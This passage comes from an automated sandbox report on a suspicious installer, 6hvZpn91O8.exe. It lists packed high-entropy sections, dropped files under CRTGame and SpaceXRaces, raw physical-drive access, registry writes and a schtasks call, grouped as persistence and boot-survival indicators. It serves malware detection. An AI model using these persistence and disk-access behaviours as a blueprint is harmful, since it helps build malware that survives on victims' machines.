                  Source: is-RPUOD.tmp.1.drStatic PE information: section name: /4
                  Source: is-C1CHO.tmp.1.drStatic PE information: section name: /4
                  Source: is-766CT.tmp.1.drStatic PE information: section name:
                  Source: is-766CT.tmp.1.drStatic PE information: section name:
                  Source: is-766CT.tmp.1.drStatic PE information: section name:
                  Source: is-QECHS.tmp.1.drStatic PE information: section name: /4
                  Source: is-C6CS8.tmp.1.drStatic PE information: section name: .eh_fram
                  Source: is-6RB4E.tmp.1.drStatic PE information: section name: asmcode
                  Source: is-AGPIJ.tmp.1.drStatic PE information: section name: .eh_fram
                  Source: is-58TJN.tmp.1.drStatic PE information: section name: /4
                  Source: is-F44SJ.tmp.1.drStatic PE information: section name: /4
                  Source: is-V4GP3.tmp.1.drStatic PE information: section name: /4
                  Source: SpaceXRaces.exe.4.drStatic PE information: section name: .hsave
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00409954 push 00409991h; ret 1_2_00409989
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0040A04F push ds; ret 1_2_0040A050
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0040A023 push ds; ret 1_2_0040A04D
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax1_2_004062CD
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004822F4 push 004823D2h; ret 1_2_004823CA
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004765B0 push ecx; mov dword ptr [esp], edx1_2_004765B1
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx1_2_004106E5
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004589F0 push 00458A34h; ret 1_2_00458A2C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00442C94 push ecx; mov dword ptr [esp], ecx1_2_00442C98
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00450E58 push 00450E8Bh; ret 1_2_00450E83
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0045101C push ecx; mov dword ptr [esp], eax1_2_00451021
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx1_2_0040D03A
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0049310C push ecx; mov dword ptr [esp], ecx1_2_00493111
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004571B0 push 004571E8h; ret 1_2_004571E0
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0045F444 push ecx; mov dword ptr [esp], ecx1_2_0045F448
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx1_2_0040F59A
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                  Source: crtgame.exe.1.drStatic PE information: section name: .text entropy: 7.600836004242041
                  Source: is-DQCHN.tmp.1.drStatic PE information: section name: entropy: 7.953893773659523
                  Source: is-65BJ1.tmp.1.drStatic PE information: section name: entropy: 7.921519965168042
                  Source: is-KANF7.tmp.1.drStatic PE information: section name: entropy: 7.966771808365004
                  Source: is-OMMAA.tmp.1.drStatic PE information: section name: entropy: 7.950928332152424
                  Source: is-766CT.tmp.1.drStatic PE information: section name: entropy: 7.491817342209834
                  Source: SpaceXRaces.exe.4.drStatic PE information: section name: .text entropy: 7.600836004242041

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_00401A58
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_02C2F29C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-OMMAA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-4NPOS.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-FGLVG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RHF7D.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-BDC3N.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-OJ8GN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-73F5N.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-FJ939.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-AGPIJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-2CG7G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\uninstall\is-4264D.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-5IVSF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-OF8TE.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-2CGLR.tmpJump to dropped file
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\SpaceXRaces\SpaceXRaces.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-F44SJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-C6CS8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_RegDLL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-ML5PH.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-ONP9R.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-G7PIK.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-849ND.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-2JPEP.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-7Q436.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-12J2O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-UT0J0.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-HASL7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-766CT.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-IG6J1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-640V1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-C1CHO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-DQCHN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-6RB4E.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-QECHS.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-KANF7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-SGP9P.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-NG6SA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-K8VM1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-V4GP3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\crtgame.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-HS78I.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-UMM6D.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-KPUSQ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeFile created: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RNIE1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-HAM7K.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-BJBAO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-V8IE4.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-S02KC.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RPUOD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-65BJ1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-Q2C64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-PIVQ2.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-KCF1P.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-NH7NT.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-58TJN.tmpJump to dropped file
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\SpaceXRaces\SpaceXRaces.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_00401A58
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_02C2F29C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 4_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA,4_2_004026F0
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
